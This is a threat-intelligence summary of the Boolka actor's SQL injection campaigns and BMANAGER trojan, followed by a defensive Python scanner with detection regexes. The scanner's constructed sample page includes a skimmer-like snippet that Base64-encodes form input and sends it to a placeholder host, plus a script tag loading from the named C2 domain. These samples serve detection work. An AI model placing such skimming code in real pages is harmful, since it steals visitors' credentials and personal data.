June 25, 2024 at 07:51AM
A new threat actor named Boolka has been targeting websites with malicious scripts to distribute a trojan called BMANAGER. Using SQL injection attacks since 2022, Boolka infects sites with JavaScript capable of capturing user data. The trojan deploys multiple modules to steal sensitive information and establishes persistence on the host. This represents a significant evolution in the group’s tactics.
The key takeaways are:
– A new threat actor dubbed Boolka has been observed carrying out opportunistic SQL injection attacks against websites since at least 2022, compromising websites with malicious scripts, and delivering a modular trojan codenamed BMANAGER.
– Boolka’s malicious JavaScript code, which connects to a command-and-control server named “boolka[.]tk,” intercepts user data in a Base64-encoded format, potentially collecting sensitive details like credentials and personal information.
– The JavaScript also redirects users to a fake loading page that prompts them to download a supposed browser extension; what is actually dropped is a downloader for the BMANAGER trojan.
– The BMANAGER trojan serves as a conduit to deploy four additional modules, namely BMBACKUP, BMHOOK, BMLOG, and BMREADER, and also establishes persistence on the host using scheduled tasks.
– Boolka’s operations reflect the group’s growing sophistication in tactics, demonstrating the development of its own malware delivery platform and trojans, such as BMANAGER, over time.
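As an added example, not code from the report or from any vendor tooling, the following Python scanner checks a page's scripts for the two indicators the takeaways describe: a script loaded from, or a URL pointing at, the named C2 domain, and inline JavaScript that listens to form input, Base64-encodes it and sends it over the network. The C2 domain is the one the report gives (defanged there as boolka[.]tk); the behavioural regexes, the `scan_page`/`host_of` helpers and the sample page are assumptions constructed for this example and serve only as a triage heuristic for a web team reviewing a site's pages.

```python
"""Heuristic scan of a page's scripts for the Boolka-style indicators described
above. Flags candidates for analyst review; it does not confirm an infection."""
from __future__ import annotations

import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# The one indicator the report names: the C2 domain (defanged there as boolka[.]tk).
KNOWN_C2_DOMAINS = {"boolka.tk"}

# Assumed patterns (not from the report) approximating the described behaviour:
# listen to form input, Base64-encode it (btoa), send it out over the network.
FORM_CAPTURE_RE = re.compile(r"addEventListener\(\s*['\"](input|change|keyup|submit)['\"]", re.I)
BASE64_RE = re.compile(r"\bbtoa\s*\(|toString\(\s*['\"]base64['\"]\s*\)")
EXFIL_RE = re.compile(r"\bfetch\s*\(|XMLHttpRequest|sendBeacon\s*\(|new\s+Image\s*\(")
URL_RE = re.compile(r"https?://[^\s'\"<>)]+|//[^\s'\"<>)]+")


def refang(value: str) -> str:
    """Turn a defanged indicator (boolka[.]tk, hxxp://) back into its real form."""
    return value.replace("[.]", ".").replace("hxxp", "http")


def host_of(url: str) -> str:
    """Hostname of an absolute or protocol-relative URL, lower-cased ('' if none)."""
    url = refang(url.strip())
    if url.startswith("//"):
        url = "https:" + url
    return (urlparse(url).hostname or "").lower()


class ScriptCollector(HTMLParser):
    """Collect external <script src> values and inline <script> bodies."""

    def __init__(self) -> None:
        super().__init__()
        self.external_srcs = []
        self.inline_scripts = []
        self._buf = None  # list while inside an inline <script>, else None

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external_srcs.append(src)
        else:
            self._buf = []

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._buf is not None:
            self.inline_scripts.append("".join(self._buf))
            self._buf = None

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)


def scan_page(html: str) -> list[dict]:
    """Return findings as dicts with a 'kind' and a 'detail', in page order."""
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    # 1. Scripts loaded from the known C2 domain.
    for src in collector.external_srcs:
        if host_of(src) in KNOWN_C2_DOMAINS:
            findings.append({"kind": "known_c2_script", "detail": src})
    for body in collector.inline_scripts:
        # 2. Inline URLs pointing at the known C2 domain.
        for url in URL_RE.findall(body):
            if host_of(url) in KNOWN_C2_DOMAINS:
                findings.append({"kind": "known_c2_url", "detail": url})
        # 3. Behavioural pattern: form capture + Base64 + network send, domain-agnostic.
        if FORM_CAPTURE_RE.search(body) and BASE64_RE.search(body) and EXFIL_RE.search(body):
            findings.append({"kind": "form_capture_base64_exfil", "detail": body.strip()[:80]})
    return findings


# Constructed sample page: one benign form handler, one script tag pulling from the
# C2 domain, and one skimmer-like script that exfiltrates to a placeholder host.
SAMPLE_PAGE = """<html><body>
<form id="login"><input name="user"><input name="pass"></form>
<script>document.getElementById('login').addEventListener('submit', function(){ console.log('ok'); });</script>
<script src="//boolka[.]tk/loader.js"></script>
<script>
document.querySelectorAll('input').forEach(function(el){
  el.addEventListener('change', function(){
    var payload = btoa(el.name + '=' + el.value);
    fetch('https://example.invalid/collect?d=' + payload);
  });
});
</script>
</body></html>"""

if __name__ == "__main__":
    for finding in scan_page(SAMPLE_PAGE):
        print(finding["kind"], "->", finding["detail"])
```

The third check is deliberately independent of the domain: if the actor rotates infrastructure, the domain match goes silent while the capture-encode-send pattern still surfaces the script for review. Expect false positives from legitimate analytics code that happens to Base64-encode form state, so treat a hit as a review item, not a verdict.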